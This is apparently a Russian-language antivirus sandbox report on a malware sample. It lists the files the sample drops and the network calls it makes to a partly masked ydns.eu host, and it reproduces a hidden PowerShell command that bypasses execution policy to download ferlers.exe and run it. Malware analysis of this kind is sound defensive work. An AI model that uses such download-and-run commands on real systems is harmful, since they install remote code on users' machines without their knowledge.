Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://tr#####wweee.ydns.eu/ferlers.exe как %appdata%\ferlers.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\FERLERS.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abdtfhgygeghdpš.sct
- %APPDATA%\ferlers.exe
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\megohmit.buc
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\nmdllhost.exe.manifest
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\skumpelskud2.sar
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\folder-videos-symbolic.symbolic.png
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\msador28.tlb
- %ProgramFiles(x86)%\demonstrationsmodeller.ini
- %TEMP%\nsd4809.tmp\system.dll
- %TEMP%\nsy9bb4.tmp\system.dll
- %TEMP%\nsoaef6.tmp\system.dll
Удаляет следующие файлы
- %TEMP%\abdtfhgygeghdpš.sct
Сетевая активность
Подключается к
- 'tr#####wweee.ydns.eu':80
TCP
Запросы HTTP GET
- http://tr#####wweee.ydns.eu/FERLERS.exe
UDP
- DNS ASK tr#####wweee.ydns.eu
Другое
Ищет следующие окна
- ClassName: '#32770' WindowName: ''
Создает и запускает на исполнение
- '%APPDATA%\ferlers.exe'
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\FERLERS.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://tr#####wweee.ydns.eu/FERLERS.exe','%APPDATA%\FERLERS.exe')' (со скрытым окном)
